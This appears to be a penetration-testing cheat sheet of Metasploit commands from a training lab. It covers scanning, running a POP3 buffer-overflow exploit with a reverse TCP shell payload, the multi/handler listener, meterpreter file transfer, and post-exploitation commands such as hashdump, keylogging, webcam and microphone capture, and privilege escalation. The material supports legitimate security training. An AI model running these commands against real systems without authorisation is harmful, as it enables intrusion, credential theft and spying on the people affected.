Links

Metasploit

Msfconsole

Exploring

Start: msfconsole
View auxiliary modules: show auxiliary
Use modules: use auxiliary/scanner/snmp/snmp_enum
View module options: show options
Set global session values: setg RHOSTS 10.11.1.5

Database access

MSF logs findings and information about discovered hosts in a database
View discovered hosts: hosts
Use the db_nmap wrapper to scan: db_nmap 10.11.1.5
Search for machines open ports: services -p 443

Exploit modules

Search exploits: search pop3
Use exploit: use exploit/windows/pop3/seattlelab_pass
View options: show options
Set options: set RHOST 10.11.1.5
View payloads: show payloads
Select payload: set payload windows/shell/reverse_tcp
View payload options: show options
Once configured, run exploit: exploit

Multi Handler

Used to receive callbacks from meterpreter payloads
use exploit/multi/handler
Set payload to match msfvenom command used to generate shell
Set IP address and port
run

Meterpreter payloads – provide additional features and functionality

View system info: sysinfo
View UID: getuid
Search files: search string
Upload files: upload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec two characters required to prevent shell escaping
Download files: download c:\\Windows\\system32\\calc.exe /tmp/calc.exe
Invoke a command shell: shell

Post exploitation

help displays a list of available meterpreter post exploitation commands
Includes: download, upload, portfwd, route, keyscan_start/stop, screenshot, record_mic, webcam_snap, getsystem (priv esc), hashdump
Useful tool for finding priv esc options use post/multi/recon/local_exploit_suggester